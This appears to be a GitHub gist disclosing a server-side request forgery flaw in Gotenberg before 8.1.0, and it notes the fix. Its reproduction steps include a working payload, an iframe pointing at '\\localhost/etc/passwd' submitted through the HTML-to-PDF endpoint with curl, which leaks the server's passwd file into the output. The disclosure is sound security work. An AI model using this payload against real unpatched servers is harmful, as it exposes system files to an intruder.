Skip to content

Instantly share code, notes, and snippets.

@filipochnik

filipochnik/vuln.md Secret

Created February 22, 2024 15:37
Show Gist options
  • Save filipochnik/bc88a3d1cc17c07cec391ee98e1e6356 to your computer and use it in GitHub Desktop.
Save filipochnik/bc88a3d1cc17c07cec391ee98e1e6356 to your computer and use it in GitHub Desktop.
Download ZIP
Gotenberg SSRF
Raw
vuln.md

Description

Affected versions of github.com/gotenberg/gotenberg (<8.1.0) are vulnerable to Server-side Request Forgery (SSRF) via the /convert/html endpoint when a request is made to a file via localhost, such as <iframe src="\\localhost/etc/passwd">.

Steps to reproduce:

  1. Start Gotenberg:

$ docker run --rm -p 3000:3000 gotenberg/gotenberg:8.0.3 gotenberg

  1. Create an index.html file with the following contents:
<head>
    <body>
        <iframe src="\\localhost/etc/passwd">
    </body>
</head>
  1. Convert index.html to pdf:
$ curl -v \
--request POST 'http://localhost:3000/forms/chromium/convert/html' \
--form 'files=@"index.html"' -o output.pdf
  1. Open output.pdf, it will include the contents of /etc/passwd.

Fix

The issue has been fixed in version 8.1.0 with this commit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment